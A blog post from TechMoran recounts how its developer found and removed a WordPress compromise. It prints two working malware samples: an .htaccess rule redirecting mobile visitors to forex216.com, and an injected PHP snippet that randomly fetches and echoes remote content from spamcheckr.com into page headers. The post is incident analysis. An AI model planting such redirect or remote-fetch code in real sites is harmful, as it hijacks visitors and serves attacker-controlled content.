">
TechMoran
  • About Us
  • Deals
  • Jobs
  • Motoring
    • Money
  • Pitch Your Startup
  • Submit Your Post
  • Freelance Gigs
  • Travel
  • Men’s Corner
  • Dating
Monday, January 18, 2021
  • Startups
  • Reviews
  • Insider
    • Obituaries
  • Business
  • Women
  • Blockchain
  • Columnists
  • Hacks & Facts
    • How To
  • Editions
    • US Edition
    • India Edition
    • MENA Edition
    • Asia Edition
    • Europe Edition
    • International Edition
No Result
View All Result
TechMoran
">
Home Tech

We were hacked! Here’s how we got even

Joshua Mutua by Joshua Mutua
6 years ago
in Tech
14 min read
0

HackedI’ve had the opportunity to work with several top blogs. While my primary positioning is as founder of my startup: kejahunt, I have worked, in both technical and writing positions for top kenyan blogs such as 140friday.com, techmoran.com, blog.gigwapi.com and femmehub.com and of course our very own blog.kejahunt.com. Am I a blogger? You ask. No. I just like to interface with technology reporting and technology itself in both capacities.

Well, back to the point: I did the new-look website for TechMoran.com. (Feedback please): Anything you’d like us to change? Of course this was based on a theme that we thought served our readers interests best, but again with his core business being a priority, we did bring that into play as we made the customizations. This probably took over a month, with back and forth feedback and negotiations on what we could do and what wouldn’t work best taking centerplay.

Again: back to the point: a few weeks ago Sam Wakoba (Techmoran’s C.E.O)received this email that he forwarded to me:

hacked

That being on a monday, and the fact that I don’t work on monday’s led me into a big debate: to rush to work or not? Of course, as you’d assume, being the workaholic that I am, I was having this debate while getting dressed up.

It’s unmentionable for a top tech blog like techmoran to be hacked as of course, you might expect the link that the traffic is being driven to  get really really good numbers. I’d rather those numbers were driven to kejahunt. Lol, you get the point.

So I got to work like an hour later (3 pm), thanks to Nairobi traffic.

READ  Nigeria's Konga.com Partners with Palmchat for Great Shopping Discounts

Related posts

Mastercard, Unilever & KCB Bank to pump over $150,000 into SMEs in Kenya via their Jaza Duka program

January 18, 2021
0

Use these smart TV security tricks to protect your privacy

January 18, 2021
0
A salesman checks a customer's iPhone at a mobile phone store in New Delhi, India, July 27, 2016. REUTERS/Adnan Abidi

How To Measure How Much You Walk On Your iPhone

January 17, 2021
0

History of Binance: The Success and Failure of One of the Most Popular Cryptocurrency Exchange

January 15, 2021
0

A quick debrief meeting with sam and i though I knew what to do: My first thought: my root index file was hacked, and must have been driving a partitioned amount of traffic elsewhere.

So I opened my index file and yes, it was as clean as I had left it when I wrote it.

Next thought: my theme index file must have been hacked: opened it, clean as I had built it.

I wish I could tell you here that I YES! I knew the third and last option that I had on my trick book that would work wonders.. But I didnt. I was clueless.

Most tech hackers would probably get stuck in code at this point, but I’d always rather take a walk away from the computer to try get perspective.

So I call one of my developer friends and explain the situation to him. While he has almost no experience with wordpress development, I figure hacking is hacking, whether on java or html.

He’s clueless too. But he leaves a good pointer: If it’s redirecting straight from the homepage then it must be a file on the root, either on the domain root, on the theme root or a dependency on either.

It hit me:  .htaccess.

.htccess, by wikipedia, is a directory-level configuration file supported by several web servers, that allows for decentralized management of web server configuration. They are placed inside the web tree, and are able to override a subset of the server’s global configuration for the directory that they are in, and all sub-directories.

Simply put: the .htaccess per-directory access control, by for example requiring a password to access the content. (the . (dot) before htaccess means the file is hidden to users.)

READ  VPS Hosting: What Benefits Do They Provide Business Owners?

So I checked my .htaccess file, and pasted down below is the file as it was:

# Use PHP5.4 as default
AddHandler application/x-httpd-php54 .php
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} “android|blackberry|iphone|ipod|iemobile|opera mobile|palmos|webos|2.0\ MMP|240×320|400X240|AvantGo|BlackBerry|Blazer|Cellphone|Danger|DoCoMo|Elaine/3.0|EudoraWeb|Googlebot-Mobile|hiptop|IEMobile|KYOCERA/WX310K|LG/U990|MIDP-2.|MMEF20|MOT-V|NetFront|Newt|Nintendo\ Wii|Nitro|Nokia|Opera\ Mini|Palm|PlayStation\ Portable|portalmmm|Proxinet|ProxiNet|SHARP-TQ-GX10|SHG-i900|Small|SonyEricsson|Symbian\ OS|SymbianOS|TS21i-10|UP.Browser|UP.Link|webOS|Windows\ CE|WinWAP|YahooSeeker/M1A1-R2D2|iPhone|iPod|Android|BlackBerry9530|LG-TU915\ Obigo|LGE\ VX|webOS|Nokia5800|w3c\ |w3c-|acs-|alav|alca|amoi|audi|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-|dang|doco|eric|hipt|htc_|inno|ipaq|ipod|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-|lg/u|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|palm|pana|pant|phil|play|port|prox|qwap|sage|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|wap-|wapa|wapi|wapp|wapr|webc|winw|winw|xda\ |xda-” [NC]
RewriteRule ^(.*)$ http://forex216.com/%{REQUEST_URI} [L,R=302]

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

For y’all non techies this simply says: for all (or all specified) mobile devices, redirect to http://forex216.com.

Again, simply put: this redirects all traffic that comes through mobile devices to http://forex216.com.

Elated, we do a quick test with sam, and true to form, everythings running straight! Yes! I’m thinking: “Can I go home sleep now? We good?”

Eager, I close my laptop, ready to rush back home and sleep off what’s left of my makeshift saturday; of course after changing [permissions on .htaccess to 577, and also changing cookies so every logged in user is logged out and also changing the file store password.

It’s not over until the fat lady sings

Just as I am about to leave the office, a quick email from a user opiniates that the blog is now redirecting to a youtube video:

I try to recreate the error unsuccessfully. Any developer will tell you there’s nothing that takes more years off our lives than an error that you can’t recreate.

But then I figure: if it happened once, its bound to happen again.

Back to code. I really wish I could spoil your day with stories of what i went through to figure out where this problem was, but simply put, and after hours of debugging, I found this additional file ‘class.php’ in the theme root that read like:

READ  Tanzanian Supermarket To Produce Its Own Electricity

<?php if (mt_rand(0,98) == 1) {function sec2_check() {if(function_exists(‘curl_init’)) {$url = “spamcheckr.com/req.php”;$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo “$data”;}}add_action(‘wp_head’,’sec2_check’);
}?>

What does this say?

For every random number between 0 and 98 which is equals to 1, got to spamcheckr.com/req.php (this is where it checks which link it is to be sent out to.)

Removing that solved our problems. But then the real problem, that we are working on finding out now, is how the hacker got access: was it a dirty plugin, a password that got into the wrong hands or something else?

I will be writing subsequent blogs on our findings.

 

Readers 2,412

Share

  • Click to share on Telegram (Opens in new window)
  • More
  • Click to share on Tumblr (Opens in new window)
  • Click to print (Opens in new window)
  • Click to share on LinkedIn (Opens in new window)
  • Click to share on Pinterest (Opens in new window)
  • Click to share on Reddit (Opens in new window)
  • Click to share on Pocket (Opens in new window)

Like this:

Like Loading...

Related

Joshua Mutua

Joshua Mutua

I blog on tech and all things startup. co-founder/CEO at www.kejahunt.com.

Related Posts

Business

Mastercard, Unilever & KCB Bank to pump over $150,000 into SMEs in Kenya via their Jaza Duka program

January 18, 2021
0
Tech

Use these smart TV security tricks to protect your privacy

January 18, 2021
0
A salesman checks a customer's iPhone at a mobile phone store in New Delhi, India, July 27, 2016. REUTERS/Adnan Abidi
Mobile

How To Measure How Much You Walk On Your iPhone

January 17, 2021
0
cryptocurrencies

History of Binance: The Success and Failure of One of the Most Popular Cryptocurrency Exchange

January 15, 2021
0
How To

How to fuliza by Safaricom guide

January 15, 2021
0
Tech

ASUS debuts new ZenBook Duo | Pro Duo, VivoBook, ExpertBook and Chromebook laptops at CES 2021

January 15, 2021
0
signal-apps
Tech

Is Signal That Different From WhatsApp? Here Are 5 Ways It May Be Different

January 15, 2021
0
Tech

Are Cheap TikTok Likes Inferior To Expensive Ones? Read Our Experts’ Discussion

January 15, 2021
0

https://bit.ly/2VOxuoBhttps://bit.ly/2VOxuoBhttps://bit.ly/2VOxuoB
ADVERTISEMENT

Join our Mailing List

Loading

Recent Posts

What to do to check whether the signal is down

January 18, 2021

Top 5 Financial Assets to Invest In 2021 According to Experts

January 18, 2021

Mastercard, Unilever & KCB Bank to pump over $150,000 into SMEs in Kenya via their Jaza Duka program

January 18, 2021

This VC firm is Calling for Changes to Cut-and-paste VC Strategy In Africa

January 18, 2021

Tizeti rolls out high-speed 4G LTE in Edo with N4000/month broadband service

January 18, 2021
">
">

Follow Us

">

There are many sites out there focused on blowing off some steam, from funny entertainment to thrilling experiences like playing online, in some cases online gaming could grant you the chance to win extra money. We came across rocketpot.io while browsing for a good btc casino online and it left us a very good impression with their wide variety of games and crypto offering.

Privacy & Cookies: This site uses cookies. By continuing to use this website, you agree to their use.
To find out more, including how to control cookies, see here: Cookie Policy

© 2019 Moran Media Group - All rights reserved TechMoran.

No Result
View All Result
  • Startups
  • Reviews
  • Insider
    • Obituaries
  • Business
  • Women
  • Blockchain
  • Columnists
  • Hacks & Facts
    • How To
  • Editions
    • US Edition
    • India Edition
    • MENA Edition
    • Asia Edition
    • Europe Edition
    • International Edition

© 2019 Moran Media Group - All rights reserved TechMoran.

Login to your account below

Forgotten Password? Sign Up

Fill the forms bellow to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In
This website uses cookies. By continuing to use this website you are giving consent to cookies being used. Visit our Privacy and Cookie Policy.
%d bloggers like this: